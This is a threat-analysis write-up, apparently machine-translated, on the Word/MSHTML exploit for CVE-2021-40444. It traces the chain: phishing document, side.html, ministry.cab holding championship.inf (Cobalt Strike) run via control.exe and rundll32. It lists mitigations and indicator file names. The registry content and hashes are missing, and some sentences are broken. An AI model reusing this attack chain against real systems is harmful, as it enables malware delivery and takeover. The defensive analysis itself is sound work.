The origin of the CVE-2021-40444 vulnerability is the ActiveX feature in Internet Explorer software. Although few people use Internet Explorer these days, this outdated browser remains a component of modern Windows operating systems, especially Microsoft Office applications such as Word and PowerPoint for rendering Web content. The old Internet Explorer engine is used for .
To exploit the CVE-2021-40444 vulnerability, attackers direct the target device to a web address via a Microsoft Word document. via this website ministry.cab malware with extension is downloaded using ActiveX, ministry.cab located in championship.inf It actually contains the Cobalt Strike malware.
After the target person clicks on this Word document containing malware, the device is taken over by the attacker. This process is contrary to the normal flow of the Word application and ActiveX is abused for the downloading process. Control.exe, seen through the Process Tree, was detected using the vulnerability coded CVE-2021-40444.AppData/Local/Temp/Low” The malware downloaded to the folder is executed.
As soon as the Word file is opened on the target device, it sends a query via ActiveX to an address named side.html to exploit the vulnerability.
The Web address used to exploit the vulnerability can be seen in String format in the Word document (“document.xml.rels”). The section marked in red is the web address of the attacker used during the exploit process. at the beginning of the web address that contains Malware. mhtml: The tag indicates that MSHTML is used, which is a feature of Microsoft Office products.
In the code fragment seen in the picture, the .cab file (Malware) downloaded from a certain server is downloaded to the "/AppData/Local/Temp/Low" location determined by the attacker with the help of ActiveXObject, and then, as the 2nd stage, rundll32 in .cpl format via Control.exe. located in .cab file with exe The championship.inf malware is run.
Used as malware by the attacker ministry.cab "" in the Cabinet file with the extension "championship.inf” can be run with rundll32.exe (DOS MZ executable).
Attackers can create an ActiveX control in a Microsoft Office document using the MSHTML rendering engine. After the attacker prepares an ActiveX control containing malicious code embedded in an MS Office document, he must deliver this document to the user. It mostly uses the Phishing (MITRE ATT&CK T1566) technique to send documents containing Malware as email attachments or links. After that, the user must open the document containing the malware to trigger the vulnerability.
After the document containing the Malware is opened, the Exploit is triggered and the malware downloaded from the attacker web address is seen in the picture.
- Turn off ActiveX controls
Save the Registry code below as .reg and run it with Admin rights, then restart the device.
Windows Registry Editor Version 5.00
- Set Microsoft Office software to automatically open documents received from the Internet in Protected View and block macros.
A patch has not yet been released by Microsoft for this security vulnerability.
.DOCX file #1 (A Letter before court 4.docx):
.DOCX file #2 (PRD.docx):
.DOCX file #3 (Project details (1).docx):
.DOCX file #4 (App description.docx):
.DOCX file #5 (court.docx):
.HTML file (side.html):
.CAB file (ministry.cab):
.DLL file (payload.dll):
.XML file (document.xml.rels):